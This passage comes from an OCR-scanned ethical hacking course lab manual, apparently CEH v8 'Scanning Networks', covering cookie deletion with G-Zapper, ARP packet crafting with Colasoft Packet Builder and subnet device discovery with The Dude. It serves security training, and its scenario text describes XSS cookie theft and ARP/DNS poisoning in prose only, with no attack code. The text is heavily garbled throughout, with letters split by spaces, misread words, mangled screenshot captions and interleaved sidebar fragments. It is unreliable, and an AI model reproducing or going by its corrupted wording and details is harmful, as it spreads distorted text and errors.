& ‫ ־‬G-Zapper can also cle an your Google search h is to ry in In te rn e t E xplo re r and M ozilla Firefox. It's fa r to o easy fo r som eone using your PC to g e t a glim p se o f w h a t you've been searching for.

http //www dum m vsoltware com

Delete Cookie

R e s t o r eC o o k i e

Test Google

Settings

R e g i s t e r

F IG U R E 16.6: B lo c k G o o g le c o o k ie (2 )

7.

T o te s t th e G o o g le c o o k ie t h a t h a s b e e n b lo c k e d , c lic k th e b u tto n .

T e s t G oogle

8.

Y o iu d e fa u lt w e b b r o w s e r w ill n o w o p e n t o G o o g le ’s P re fe re n c e s p a g e . C lic k

OK.
AA

goog... P - 2 (5 [ 0 ?references

‫יו‬ Sign in

1

♦You Search Images Maps Play YouTube News Gmal More ‫־‬

Google

Preferences

Goflflls Account 5£tt303 Piefeiences Help I About Google Save Preferences

Save your preference* when finished and !*turn to iw r c h

Global Preferences (changoc apply to al Googio sorvtcos)

Your cookies seem fo be disabled.
Setting p referen ces will not w o rk until you enable co o kies in y ou r browser.

BaHiflafcfllttg
Interface Language Display Googio Tips and messages in: Engiisn If you do not find your native language in the pulldown above you can help Google create it through our Google in Your I anfliiage program

Search I anguag*

P iefei pages m itten in the*e language(*)

□ Afrikaans

b£ English
I~ Estonian

U Indonesian L I Setblan

□ A r a b i c
D Armenian

L .E s p e r a n t oU I t a l i a n
F I Japanese

□S l o v a k
0 Slovenian

□ Belarusian U Bulgarian

C Ftipino L Finnish

□ Koiean U Latvian

G Spanish L I Swahi

F IG U R E 16.7: C o o k ie s d is a b le d m a ssag e

9.

T o v i e w th e d e le t e d c o o k ie i n f o r m a t io n , c lic k d ie c lic k

S e ttin g

b u tto n , a n d

V ie w Log

i n t h e c le a n e d c o o k ie s l o g .

C E H Lab M anual Page 247

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

G-Zapper - TRIAL VERSION
W h a t is G -Zapper

‫׳‬- m

G-Zapper Settings
Sounds f* R a y sound effect w hen a cookie is deleted d efault w av

Preview

Browse

G oogle Analytics T iack rtg Q Y o u c a n s im p ly ru n
W

Blo ck Google Analytics fiom tia ck n g w eb sites that I visit.

G - Z a p p e r, m in im iz e th e w in d o w , a n d e n jo y y o u r e n h a n c e d s e a rc h p r iv a c y D eaned Cookies Log
W

Enab le logging of cookies that h ave recently been cleaned. S a v e my G oogle ID in the d ean ed cookies log.

C lear Log

V ie w Log

I”

OK

Delete Cookie

Resto re Cookie

T e st Google

Settings

R egister

F IG U R E 16.8: V ie w in g th e d e le te d lo g s

1 0 . T h e d e le t e d c o o k ie s i n f o r m a t i o n o p e n s i n N o t e p a d .

cookiescleaned - Notepad
File Edit Format View Help

t

‫ ־־[ם‬x

S ' T ools d em o nstrate d in th is lab are a va ila b le in D:\CEHTools\CEHv 8 M odule 03 S canning N e tw o rks

(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox \Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 10:42:13 A M (Chrome) C:\Users\Administrator\AppData\Local\Google\Chrome\User Data \Default\Cookies Friday, August 31, 2012 11:04:20 A M (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox \Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 11:06:23 A M (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox \Profiles\5vcc40ns.default\cookies.sq lite Wednesday, September 05, 2012 02:52:38 P M |

F IG U R E 16.9: D e le te d lo g s R e p o r t

L a b

A n a ly s is

D o c u m e n t a ll t h e I P a d d re s s e s , o p e n p o r t s a n d r u n n i n g a p p lic a t io n s , a n d p r o t o c o ls y o u d i s c o v e r e d d u r i n g d i e la b .

C E H Lab M anual Page 248

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility

In fo r m a tio n

C o lle c t e d / O b je c t iv e s A c h ie v e d

A c tio n P e rfo rm e d : ■ ■ G ‫־‬Z a p p e r ■ D e t e c t d i e c o o k ie s D e le t e t h e c o o k ie s B l o c k t h e c o o k ie s

R e s u l t : D e le t e d c o o k ie s a re s t o r e d i n C :\U s e r s \A d m in is tr a to r \ A p p lic a tio n D a ta

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R T O T H I S

I F

Y O U

H A V E

Q U E S T I O N S

R E L A T E D

L A B .

Q u e s t io n s
1. E x a m i n e h o w G - Z a p p e r a u t o m a t i c a l l y c le a n s G o o g l e c o o k ie s .

2.

C h e c k t o s e e i f G - z a p p e i i s b l o c k i n g c o o k i e s o n s ite s o t h e r t h a n G o o g l e .

In t e r n e t C o n n e c tio n R e q u ir e d 0 Y es S u p p o rte d □ iL a b s □ N o

P la tfo r m 0

C la s s r o o m

C E H Lab M anual Page 249

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab

S canning th e N etw ork Using th e C olasoft P ack e t Builder
The Colasoft Packet Builder is a useful toolfor creating custom netirork packets. I CON
V a lu a b le in fo r m a tio n

KEY

L a b

S c e n a r io

11 1 d i e p r e v i o u s l a b y o u h a v e l e a r n e d l i o w y o u c a n d e t e c t , d e le t e , a n d b l o c k c o o k ie s .
A tta c k e rs e x p lo it d ie XSS v u ln e r a b ilit y , w h ic h in v o lv e s an a tta c k e r p u s h in g

Test your k n o w le d g e

m a lic io u s J a v a S c r ip t c o d e i n t o

a w e b a p p lic a tio n . W h e n a n o d ie r u s e r v is its a p a g e

w i d i d i a t m a lic io u s c o d e i n it , d ie u s e r ’s b r o w s e r w i l l e x e c u te d ie c o d e . T h e b r o w s e r lia s

Q Q

W e b e x e r c is e

110 w a y o f t e l l i n g t h e d i f f e r e n c e b e t w e e n l e g i t i m a t e a n d m a l i c i o u s c o d e . I n j e c t e d

c o d e is a n o d i e r m e c h a n i s m d i a t a n a t t a c k e r c a n u s e f o r s e s s io n h i j a c k i n g : b y d e f a u l t
W o r k b o o k r e v ie w

c o o k ie s s t o r e d b y th e b r o w s e r c a n b e r e a d b y J a v a S c r ip t c o d e . T h e in je c t e d c o d e c a n r e a d a u s e r ’ s c o o k ie s a n d t r a n s m i t d io s e c o o k ie s t o d i e a tt a c k e r . A s a n e x p e rt

e th ic a l h a c k e r

and

p e n e tra tio n te s te r

y o u s h o u l d b e a b le t o p r e v e n t fie ld s , a n d h id d e n

s u c h a tt a c k s b y v a l id a t in g a ll h e a d e r s , c o o k ie s , q u e r y s tr in g s , f o r m

f ie ld s , e n c o d in g i n p u t a n d o u t p u t a n d f i l t e r m e ta c h a r a c te r s i n t h e i n p u t a n d u s in g a w e b a p p lic a t io n f ir e w a ll t o b l o c k th e e x e c u t io n o f m a lic io u s s c r ip t . A n o d i e r m e t h o d o f v u ln e r a b ilit y c h e c k in g is t o P acket B u ild e r . 111 t h i s la b , you w ill be le a r n s c a n a n e t w o r k u s in g th e C o la s o ft about s n iffin g n e tw o rk p a c k e ts ,

p e r f o r m in g A R P p o is o n in g , s p o o f in g th e n e t w o r k , a n d D N S p o is o n in g .

^ T T o o ls

L a b

O b je c t iv e s

d em o nstrate d in th is lab are a va ila b le in D:\CEHTools\CEHv 8 M odule 03 S canning N e tw o rks

T h e o b je c t iv e o f d i is la b is t o r e in f o r c e c o n c e p t s o f n e t w o r k s e c u r it y p o li c y , p o li c y e n f o r c e m e n t , a n d p o l i c y a u d it s .

L a b

E n v ir o n m e n t

11 1 d i i s l a b , y o u n e e d :
■ C o la s o f t P a c k e t B u ild e r lo c a t e d a t

D:\CEH-Tools\CEHv 8 M odule 03 S canning N etw orks\C ustom P acket C reator\C olasoft P a cke t B uilder
c o m p u te r r u n n in g

A

W indow s Server 2012

as h o s t m a c h in e

C E H Lab M anual Page 250

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s


W indow 8

r u n n i n g o n v ir t u a l m a c h in e as ta r g e t m a c h in e

Y o u c a n a ls o d o w n l o a d d i e l a t e s t v e r s i o n o f

A dvanced C olasoft P acket

B uilde r
php ■

fro m

d ie lin k

h t t p : / / w w w .c o la s o ft.c o m / d o w n lo a d /p r o d u c ts /d o w n lo a d _ p a c k e t_ b u ild e r .

I f y o u d e c id e t o d o w n l o a d d i e d ie la b m ig h t d if f e r .

la te s t version,

d ie n s c re e n s h o ts s h o w n in

A w e b b r o w s e r w i d i I n t e r n e t c o n n e c t io n n u u iin g i n h o s t m a c liin e

L a b

D u r a t io n

T im e : 1 0 M in u te s

O v e r v ie w

o f C o la s o f t P a c k e t B u ild e r
c r e a t e s a n d e n a b le s c u s t o m n e t w o r k p a c k e t s . T h i s t o o l c a n

C olasoft P acket B uild e r

b e u s e d t o v e r i f y n e t w o r k p r o t e c t i o n a g a in s t a tt a c k s a n d in t r u d e r s . C o la s o f t P a c k e t B u i l d e r f e a t u r e s a d e c o d i n g e d i t o r a l l o w i n g u s e r s t o e d i t s p e c i f i c p r o t o c o l f i e l d v a lu e s m u c h e a s ie r . U s e r s a r e a l s o a b le t o e d i t d e c o d i n g i n f o n n a t i o n i n t w o e d i t o r s :

Decode E d ito r

and

Hex Editor. U s e r s c a n s e l e c t a n y o n e o f IP P acket, ARP P acket, o r TCP Packet.
L a b
S t a s k

d ie p r o v id e d te m p la te s :

E thernet Packet,

T a s k s
In s t a ll a n d la u n c h d ie L a u n c h th e

1
1. 2.

C olasoft P acket Builder.

S canning N e tw o rk

S ta rt

m e n u b y h o v e r in g d ie m o u s e c u r s o r o n th e lo w e r - le f t

c o r n e r o f th e d e s k to p .

F IG U R E 17.1: W in d o w s S e rv e r 2012 - D e s k to p v ie w

3.
Q y <u c a n d o w n lo a d “ Yo C o la s o ft P a c k e t B u ild e r fro m h ttp : / / w w w . c o la s o ft. co m .

C l i c k t h e C o la s o ft P a c k e t B u ild e r 1.0 P a c k e r B u ild e r w i n d o w

a p p to o p e n th e

C o la s o ft

C E H Lab M anual Page 251

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

S ta rt

Administrator

Sew

Windows PowerSM
m

Googte Chrome

Cotaoft Pacto?! Bunder t.O

Es
compule r

*
Manager

*
v Mochn#.

*

control 1 'and

*J

V
Command Prompt

91
U3LWv«r Irn-.aljt 0‫י־‬ Center.

9 MfrtjpaC* Studc

e

te r
se

V
.
M

3
Nnwp 7«ftmap GUI

r»efax CMtoo

e u M a

$

o

F IG U R E 17.2 W in d o w s S e rv e r 2012 - A p p s

4.

T h e C o la s o f t P a c k e t B u ild e r m a in w i n d o w a p p e a rs .
Colasoft Packet Builder 1= 1 ‫ך־־‬ !

Fie # Import

Edt ^

Send

Help

1 S ?’ & Add Insert

1
Packet No.

♦ No pxkec elected:

Checksum

4 $ Oecode Edro*‫־‬

\ $Packet Lilt

[A s^J

Adapter Packets

5 5

Colasoft
0 Selected 0 1

Delta Time Sourer

O p e ra tin g syste m re q u ire m e n ts : W in d o w s S e rv e r 200 3 a n d 6 4 - b it E d itio n W in d o w s 2 0 0 8 a n d 6 4 - b it E d itio n W in d o w s 7 a n d 64-b it E d itio n

> 0 :0

^

He«Edfcor

fatal

0 byte* |

< L
F IG U R E 17.3: C o la s o ft P a c k e t B u ild e r m a in screen

5.

B e fo re

s ta r tin g

o f y o u r ta s k , c h e c k

th a t d ie

A d a p te r

s e t t in g s

a re

se t to

d e fa u lt a n d d ie n c lic k

OK.
Select Adapter *

A d ap ter:

Ph ysical Address Link Sp eed M ax Fram e Size IP Address D efau lt G atew ay A d ap ter Sta tu s

D 4 :BE:D 9 :C 3 :C E:2 D 0 100.0 l* )p s 1500 b ytes 10.0.0.7/255.255.255.0

1 0 .0 .0 .1
O perational

OK

C ancel

Help

F IG U R E 17.4: C o la s o ft P a c k e t B u ild e r A d a p te r settings

C E H Lab M anual Page 252

E th ic a l H ackin g and Counterm easures Copyright < 0by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

6.
T h e re a re tw o w a y s to c re a te a p a c k e t - A d d a n d In s e rt. T h e d iffe re n c e b e tw e e n th e s e is th e n e w ly a d d e d p a c k e t's p o s itio n in th e P a c k e t L is t . T h e n e w p a c k e t is lis te d as th e la s t p a c k e t in th e lis t i f ad d e d b u t a fte r th e c u rre n t p a c k e t i f in s e rte d .

T o add

0 1 c r e a t e d i e p a c k e t , c l i c k Add 111 d i e m e n u s e c t i o n .

File ff 1 Import [ ^

Edit

Send

Help

0
Export‫־‬ ‫״‬ ‫־‬ Add Insert

Decode Editor

F IG U R E 17.5: C o la s o ft P a c k e t B u ild e r cre a tin g d ie p ack et

7.

W h e n an a n d c lic k

A dd P a cke t OK.

d ia lo g b o x p o p s u p , y o u n e e d t o s e le c t d i e t e m p la t e

Q c o la s o f t P a c k e t B u ild e r s u p p o rts * .c s c p k t (C a p s a 5 .x a n d 6 .x P a c k e t F ile ) a n d * c p f (C a p s a 4.0 P a c k e t F ile ) fo rm a t. Y o u m a y a ls o im p o rt d a ta fro m ‫ ״‬.c a p (N e tw o r k A s s o c ia te s S n iffe r p a c k e t file s ), * .p k t (E th e r P e e k v 7 / T o k e n P e e k / A 1 ro P e e k v 9 / O m n iP e e k v 9 p a c k e t file s ), * .d m p (T C P D U M P ), a n d * ra w p k t (ra w p a c k e t file s ).

Add Packet
Select Template:

‫־‬n n

ARP Packet 0.1

Delta Time:

Second

OK

Cancel

Help

F IG U R E 17.6: C o la s o ft P a c k e t B u ild e r A d d P a c k e t d ia lo g b o x

8.

Y ou

can

v ie w

d ie

added

p a c k e ts

lis t

0 11 y o u r r i g h t - h a n d s id e o f y o u r

w in d o w .

Packet List S

Packets

1

Selected

1

t a s k

2

_______ U sl______ Delta Tims . S o u r c e 1 0.100000 00:00:00:00:00:00

D e s tin a tio n _______,

Decode E ditor
F IG U R E 17.7: C o la s o ft P a c k e t B u ild e r P a c k e t L is t

9.

C o la s o f t P a c k e t B u ild e r a llo w s y o u t o e d it d ie t w o e d it o r s :

decoding

in f o r m a t io n i n d ie

Decode E ditor

and

H ex Editor.

C E H Lab M anual Page 253

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Decode Editor Packet: B-© Ethernet Type I I le s tin a tio n Address: J© Source Address: j ! ^ P r o to c o l: - sj ARP - Address Resolution Protocol !• • • • < # >Hardware type: ! ‫ץ‬#( Protocol Type: j..© Hardware Address Length: ‫ן‬..© Protocol Address Length: !
\

Q B u s t M o d e O p tio n : I f y o u c h e c k th is o p tio n , C o la s o ft P a c k e t B u ild e r se n d s p a c k e ts o n e a fte r a n o th e r w ith o u t in te rm is s io n . I f y o u w a n t to s e n d p a c k e ts a t th e o rig in a l d e lta tim e , d o n o t c h e c k th is o p tio n .

|— <#1ype: -^J>S0urce Physics:

j3 ‫ ״‬Source IP : D estination Physics: j D estination IP : - •© Extra Data: Number of Bytes: FCS: L # FCS: ■<l— 1 1 1 j

Num:000001 Length:64 Captured:• [0/14] FF: FF: FF: FF: FF: FF [0/6] 00:00:00:00:00:00 [6/6] (ARP) [12. 0x0806 [14/28] (Ethernet) 1 0x0800 [16/2] 6 [18/1] 4 [19/1] (ARP Reque. 1 00:00:00:00:00:00 [22/6] 0.0.0.0 [28/4] 00:00:00:00:00:00 [32/6] 0.0.0.0 [38/4] [42/18] 18 bytes [42/18] 0xF577BDD9 ...... ; ......,.... ‫־‬ .... ‫>״‬J

F IG U R E 17.8: C o la s o ft P a c k e t B u ild e r D e c o d e E d ito r

^ Hex Editor 0000 FF FF FF 000E 00 01 08 001C 00 00 00 002A 00 00 00 0038 00 00 00

Total FF 00 00 00 00 FF 06 00 00 FF 04 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 06 00 00 00 ....

60 bytes

V

F IG U R E 17.9: C o la s o ft P a c k e t B u ild e r H e x E d ito r

1 0 . T o s e n d a ll p a c k e ts a t o n e t im e , c lic k 11. C h e c k d ie d ie n c lic k

Send All

f r o m d ie m e n u b a r. d ia lo g w in d o w , a n d

Burst Mode Start.

o p t io n i n d ie

Send All Packets

‫ר‬
£ 0 1 O p tio n , L o o p S e n d in g : T h is d e fin e s th e re p e a te d tim e s o f th e se n d in g e x e c u tio n , o n e tim e in d e fa u lt. P le a s e e n te r z e ro i f y o u w a n t to k e e p se n d in g p a c k e ts u n til y o u p a u se o r s to p it m a n u a lly .

^4

C o la s o f t C a p s a

Jown Checksum

Send Send All Packets

Packet Analyzer 1 Selected 1

1

Packet List No. 1 Delta Time Source 0.100000 00:00:00:00:00:00

Destination FF:FF:FF:FF:FF:FF

F IG U R E 17.10: C o la s o ft P a c k e t B u ild e r S e n d A ll b u tto n

C E H Lab M anual Page 254

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

£ 3 S e le c t a p a c k e t fro m th e p a c k e t lis tin g to a c tiv a te S e n d A ll b u tto n

F IG U R E 17.11: C o h s o ft P a c k e t B u ild e r S e n d A H P a c k e ts

12.

C lic k

S ta rt

Send All Packets
O p tions A d a p te r: R e a lte k P C Ie G 8 E Fam rfy C o n tro ller

Select...

B u rs t M ode (n o d e la y b e tw e e n p a ck e ts)

Lo op S e n d n g :

1

D e la y B e tw e e n Lo o p s:

A 1 0 0 0 A 1000 -

loops (z e ro fo r in fin ite lo o p )

m illiseconds

Sen d in g In fo rm a tio n £ 0 T h e p ro g re s s b a r p re s e n ts a n o v e r v ie w o f th e s e n d in g p ro c e s s y o u are e n g a g e d in a t th e m o m e n t. P ro g re ss: P a c k e ts S e n t: 1

T o tal P a c k e ts :

1

S ta r t

S to p

C lo se

H elp

F IG U R E 1 7 .12 C o la s o ft P a c k e t B u ild e r S e n d A H P a c k e ts

13.

T o

e x p o rt

d ie

p a c k e ts

sent

fro m

d ie

F ile

m enu,

s e le c t

F ile ‫ ^־‬E x p o rt‫ ^־‬A ll Packets.

C E H Lab M anual Page 255

E th ic a l H ackin g and Counterm easures Copyright < 0by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

‫ י‬li‫״‬ File Edit Export Send 1* ►
^

‫ר״‬ Colas Help 0 1 ‫ ׳‬a X glete ketNo. |_ jJ I Num: 00( ] 0/14[ ‫ן‬ FF: FF:1
00:00:( ,

Import... 10

All Packets...

Exit + ^T Packet:

Selected Packets...

El••© E thernet Type I I

^ D e s tin a tio n Address: Source Address:
F IG U R E 17.13: E x p o r t A ll P a c k e ts p o tio n

Q

O p tio n , P a c k e ts S e n t

Save As
5avein‫!"! ־‬:o la e c -ft f lf c l Rcccnt plocca Nome D«tc modified No items match your search. Type

x I

T h is s h o w s th e n u m b e r o f p a c k e ts s e n t s u c c e s s fu lly . C o la s o ft P a c k e t B u ild e r d is p la y s th e p a c k e ts se n t u n s u c c e s s fu lly , to o , i f th e re is a p a c k e t n o t s e n t o u t.

■ Desktop

<

3

Libraries lA f f Computer

Network

r n _______ F 1Un»m* S»v• •c typ♦
|

... Fjiekct• e « c p ld v j v | Sav• C«rc«l

[> 1
|

(Colafloft Packot Rio (v6) (*.oocpkt)

F IG U R E 17.14: S e le c t a lo c a tio n to save th e ex p o rted file

U
Packets.cscpkt
F IG U R E 17.15: C o la s o ft P a c k e t B u ild e r e x p o rtin g p ack et

L a b

A n a ly s is

A n a l y z e a n d d o c u m e n t d i e r e s u l t s r e l a t e d t o t h e l a b e x e r c is e .

T o o l/U tility

In fo r m a tio n

C o lle c t e d / O b je c t iv e s A c h ie v e d

A d a p t e r U s e d : R e a lte k P C I e F a m ily C o n t r o lle r C o la s o ft P a c k e t S e le c t e d P a c k e t N a m e : A R P P a c k e ts B u ild e r R e s u lt : C a p tu r e d p a c k e ts a re s a v e d i n p a c k e ts .c s c p k t

C E H Lab M anual Page 256

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R T O T H I S

I F

Y O U

H A V E

Q U E S T I O N S

R E L A T E D

L A B .

Q u e s t io n s
1. A n a ly z e how C o la s o ft P a c k e t B u ild e r a ffe c ts y o u r n e tw o rk tr a ffic w h ile

a n a ly z in g y o u r n e t w o r k . 2. 3. E v a lu a te w h a t ty p e s o f in s t a n t m e s s a g e s C a p s a m o n it o r s . D e te r m in e w h e t h e r d ie p a c k e t b u f f e r a ffe c ts p e r fo r m a n c e . I f y e s , th e n w h a t s te p s d o y o u ta k e t o a v o id o r r e d u c e it s e f f e c t o n s o ft w a r e ?

In t e r n e t C o n n e c tio n R e q u ir e d □ Y es S u p p o rte d 0 iL a b s 0 N o

P la tfo r m 0

C la s s r o o m

C E H Lab M anual Page 257

Eth ica l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab

S canning D evices in a N etw ork Using T h e Dude
I CON
5 V a lu a b le

KEY

The D n d e automatically scans all devices within specified subnets, draws a n d lays out a w a p of y o ur networks, monitors services ofy ou r devices, a n d a/eftsyon in case

in fo r m a tio n

some service hasp roblems. L a b S c e n a r io
p r e v io u s la b you le a r n e d ho w p a c k e ts can be c a p tu re d u s in g C o la s o ft a

Test your k n o w le d g e

W e b e x e r c is e

1 1 1 th e

P a c k e t B u ild e r . A tta c k e r s t o o
W o r k b o o k r e v ie w

c a n s n i f f c a n c a p t u r e a n d a n a ly z e p a c k e t s f r o m n e tw o rk in fo r m a t io n . The a tta c k e r can

n e tw o rk

and

o b ta in

s p e c if ic

d is r u p t

c o m m u n ic a tio n

b e tw e e n h o s ts a n d c lie n ts b y m o d if y in g s y s te m

c o n fig u r a tio n s ,

o r t h r o u g h th e p h y s ic a l d e s t r u c t io n o f th e n e t w o r k . A s a n e x p e r t e th ic a l h a c k e r, y o u s h o u l d b e a b l e t o g a d i e r i n f o r m a t i o n 0 11 o rg a n iz a tio n s n e tw o rk to c h e c k fo r v u ln e ra b ilitie s and fix th e m b e fo re an a tta c k e r g e ts to c o m p ro m is e th e m a c h in e s using th o s e v u ln e ra b ilitie s . I f d e te c t any a tta c k th a t has been p e rfo rm e d

you

0 11 a n e t w o r k , im m e d ia t e ly

im p le m e n t p r e v e n t a tiv e m e a s u re s t o s to p a n y a d d itio n a l u n a u th o r iz e d a c c e s s .

1 1 1th is

l a b y o u w i l l le a r n t o u s e T h e D u d e t o o l t o s c a n t h e d e v ic e s i n a n e t w o r k

a n d th e t o o l w i l l a le r t y o u i f a n y a tt a c k h a s b e e n p e r f o r m e d

0 11 t h e n e t w o r k .

L a b

O b je c t iv e s

T h e o b j e c t i v e o f t h i s l a b i s t o d e m o n s t r a t e h o w t o s c a n a l l d e v ic e s w i t h i n s p e c i f i e d s u b n e t s , d r a w a n d l a y o u t a m a p o f y o u r n e t w o r k s , a n d m o n i t o r s e r v ic e s n e tw o rk .

0 11 d i e

V —J Tools d em o nstrate d in th is lab are a va ila b le in D:\CEHTools\CEHv 8 M odule 03 S canning N e tw o rks
C E H Lab M anual Page 258

L a b

E n v ir o n m e n t

T o c a r r y o u t th e la b , y o u n e e d : ■ T h e D u d e is lo c a t e d a t

D:\CEH-T 0 0 ls\C EH v 8 M odule 03 S canning N e tw o rk s \N e tw o rk D is c o v e ry and M apping T o o ls\T h e Dude The Dude
fro m th e

Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f h ttp : / / w w w .m ik r o tik .c o m / th e d u d e .p h p

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , t h e n i n th e la b m ig h t d if f e r

s c re e n s h o ts

show n

■ ■

A

c o m p u te r r u n n in g W in d o w s S e rv e r 2 0 1 2

D o u b le - c lic k d ie in s t a ll

The Dude

a n d f o l l o w w i z a r d - d r iv e n in s t a lla t io n s te p s t o

The Dude

A d m i n i s t r a t i v e p r iv ile g e s t o r u n t o o ls

L a b

D u r a t io n

T im e : 1 0 M in u te s

O v e r v ie w

o f T h e

D u d e

T h e D u d e n e t w o r k m o n i t o r is a n e w a p p lic a t io n d i a t c a n d r a m a t ic a lly i m p r o v e d ie w a y y o u m a n a g e y o u r n e t w o r k e n v i r o n m e n t I t w i l l a u t o m a t i c a l l y s c a n a l l d e v ic e s w i t h i n s p e c i f i e d s u b n e t s , d r a w a n d l a y o u t a m a p o f y o u r n e t w o r k s , m o n i t o r s e r v ic e s o f y o u r d e v ic e s , a n d a l e r t y o u i n c a s e s o m e s e r v ic e l i a s p r o b l e m s .

L a b
1.

T a s k s
L a u n c h th e

S ta rt

m e n u b y h o v e r in g th e m o u s e c u r s o r o n th e lo w e r - le f t

c o r n e r o f th e d e s k to p .

i|

Windows Server 2012

Ser*? 2 0 1 2M«a1 eC an dW ateDitaceM* ____________________________________________________________________________Ev^mbonoopy BuildWX:

F IG U R E

18.1: Windows Server 2012 - Desktop view

E

t a s k

1

1 1 1 t h e S ta rt m e n u , t o l a u n c h T h e Dude, c l i c k T he Dude i c o n .

Launch The Dude
S ta rt Administrator

^

Server Maiwgcr

Com puter

O n m
*

SS?
f>

b

U

~ v
M m n ttr.

e

- —1
com m and Prompi

‫יי‬
1n»0u0f

T < x J1

%

0

— l»p

C E H Lab M anual Page 259

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 182 : W in d o w s S e rv e r 2012 - S ta rt m e n u

3.

T h e m a in w in d o w o f
fS m m
(§) 5references Setting*
Contert* □ A3<*T3S USS A Admn#

The Dude

w ill a p p e a r.
’ - l ° l jjy i2 m c * ‫״‬
X

adm in@ localhost - The Dude 4.0beta3 9 Local Server CJ 71S E 1 O * Ssttnst j
Cikovot *70011

‫י‬

H do

m
V J

W

‫•־‬. .*.‫ ־‬Lay* irk(

H 0 ‫»ו»י‬
H D*wic«» 5

?5? Flea □ Functona M Htfay Action*
H □ Lntu Lc0*

£7 £7 Cecus £ 7 &‫׳‬em £7 Syslog
E Notic?

-A

- B Keftroric Maps B Lccd
t- ! U n i r t i

J
Cterl. w
Uj « /U

[.Ca 1MU«d

334 bw «

S*‫׳ ״*־‬x215bc*.'UM2bc«

F IG U R E 18.3: M a in w in d o w o f T h e D u d e

4.

C lic k th e
---- -------------®
5reference* —

D is c o v e r
■ ■
*b

b u t t o n o n th e t o o lb a r o f d ie m a in w in d o w .
admin@localhost - The Dude 4.0beta3
rh tZ

.
3 ‫•־‬. •v E

‫ ״‬1 x ® IIIIJH b _d
2

9 Local Seiver

a C a-ite‫־׳‬ !*
Q Addra# list* A ‫׳‬vamro □ 0 ‫יו*ו‬ f‫“־‬l OmiaN f * . Ftea f= 1 F_nccon8 B Haay Action* n 1 ^‫*י‬ “ □ Legs £ ? ActJcn £7 D efcus £7 Event £7 Sjobg R Mb N otie? - Q Network M aos B Lccdl M

c‫׳‬

*
-1+‫״‬ o

*

Sottrco

Dkov* ‫* | ־‬Too•

‫| ?יי׳‬lrk*

‫י‬

'‫׳‬

|!Corrected

Cfert. ix $59bus /tx 334bp*

:«<* a215bc«<'u642bc«

F IG U R E 18.4: S e le c t d is c o v e r b u tto n

5.

The

D e vice D is c o v e ry

w in d o w a p p e a rs .

C E H Lab M anual Page 260

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Device Discovery General Services Device Types Advanced
Enter subnet number you want to scan for devices

Discover Cancel

Scan Networks: 1 10.0.0.0/24 Agent: |P£g? P Add Networks To Auto Scan Black List: |1 Device Nam e Preference: |DNS. SNMP. NETBIOS. IP Discovery M ode: (• fast (scan by ping) C reliable (scan each service) Recursive Hops: ‫פ ר ־ י ו‬ / ‫י‬
2 I 4 I 6 I 8 I 10 I 14 I I I 20 50

!-

F Layout M ap /tfter Discovery Com plete

F IG U R E 18.6: D e v ic e d is c o v e ry w in d o w

6.

111 t h e D e v i c e D i s c o v e r y w i n d o w , s p e c i f y

d e fa u lt
and

fro m m

d ie d ie

A g e n t d ro p -d o w n

l i s t , s e le c t

S can N e tw o rk s r a n g e , s e l e c t DNS, SNMP, NETBIOS.
d r o p - d o w n lis t, a n d c lic k

IP f r o D iscover.

D e vice N am e P re fe re n ce

Device Discovery General Services Device Types Advanced
number you want to scan for

Scan Networks: (10.0.0.0/24 Agent: 5 S S H B I r Add Networks To Auto Scan Black List: [none Device Nam e Preference DNS. SNMP. NETBIOS. IP

Discovery M ode (• fast (scan by ping) C reliable (scan each service) 0 Recursive Hops: [1 ]▼] /—r ‫ו —ר‬ — 1 —1 — 1 -----------------------------------------2 4 6 8 10 14 20 SO

3

I - Layout M ap /tfter Discovery Com plete

F IG U R E 18.7: S e le ctin g d e vic e n am e p re fe re n ce

7.

